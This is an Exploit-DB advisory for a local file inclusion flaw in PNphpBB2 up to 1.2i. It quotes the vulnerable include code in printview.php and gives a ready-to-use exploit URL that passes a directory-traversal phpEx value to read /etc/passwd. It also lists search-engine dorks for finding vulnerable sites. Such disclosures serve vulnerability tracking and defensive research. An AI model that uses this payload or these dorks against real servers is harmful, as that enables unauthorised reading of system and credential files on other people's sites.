EXPLOITS

PNPHPBB2 < 1.2i - 'PHPEx' Local File Inclusion

Author: irk4z
type: webapps
platform: php
port: 
date_added: 2007-12-25  
date_updated: 2017-01-12  
verified: 1  
codes: OSVDB-39879;CVE-2007-6624  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comPNphpBB2_1.2i.zip  

raw file: 4796.txt  

.-----------------------------------------------------------------------------.
|  vuln.: PNphpBB2 <= 1.2i (printview.php phpEx) Local File Inclusion Vuln.   |
|  download: http://www.pnphpbb.com/                                          |
|  dorks: Powered by PNphpBB2 / Powered por PNphpBB2                          |
|         inurl:"index.php?name=PNphpBB2"                                     |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: str0ke, wacky, polish under ;]                                  |
'-----------------------------------------------------------------------------'

# code:

  /printview.php:
  ...
      define('IN_PHPBB', true);
      $ModName = basename( dirname( __FILE__ ) );
      $phpbb_root_path = './modules/' . $ModName . '/';
      include($phpbb_root_path . 'extension.inc');
      include($phpbb_root_path . 'common.'.$phpEx);
  ...

  LFI in $phpEx :D:D:D

# sploit:

http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=/../../../../../../../etc/passwd
http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=[ LFI ]

# milw0rm.com [2007-12-26]